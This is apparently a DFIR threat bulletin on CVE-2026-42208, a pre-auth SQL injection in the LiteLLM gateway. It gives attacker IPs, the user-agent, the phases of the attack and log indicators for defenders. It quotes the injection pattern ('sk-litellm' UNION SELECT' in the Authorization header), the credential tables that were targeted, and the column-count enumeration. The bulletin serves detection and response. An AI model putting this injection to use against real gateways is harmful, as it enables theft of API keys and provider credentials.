CVE-2026-42208

Critical pre-auth SQL injection in LiteLLM AI gateway exploited within 36 hours of disclosure. Attackers targeted high-value tables containing provider credentials and API keys with surgical precision.

Technical details: • CVE-2026-42208 in LiteLLM versions 1.81.16-1.83.6 allows arbitrary SELECT queries via Authorization header • Attacker used sk-litellm' UNION SELECT payloads targeting litellm credentials, LiteLLM VerificationToken, and litellm config tables • Exploitation from IPs 65[.]111[.]27[.]132 and 65[.]111[.]25[.]67 using Python/3.12 aiohttp/3.9.1 user-agent • Operator demonstrated schema knowledge, switching from lowercase to PascalCase table names when queries failed

Attack methodology: • Phase 1: Direct targeting of three highest-value tables containing OpenAI/Anthropic credentials • Phase 2: Column-count enumeration using varying NULL placeholders (T1190, T1552.001) • No generic SQLmap patterns - deliberate, customized exploitation suggesting prior schema analysis • IP rotation between phases indicates sophisticated tooling to evade rate limits

DFIR opportunities: • Web logs showing POST /chat/completions with Authorization: Bearer sk-litellm' patterns • Requests containing UNION SELECT, table names litellm credentials, "LiteLLM VerificationToken" • Python aiohttp user-agent combined with SQL injection indicators • Upstream provider billing anomalies from unexpected IP ranges

#DFIR Radar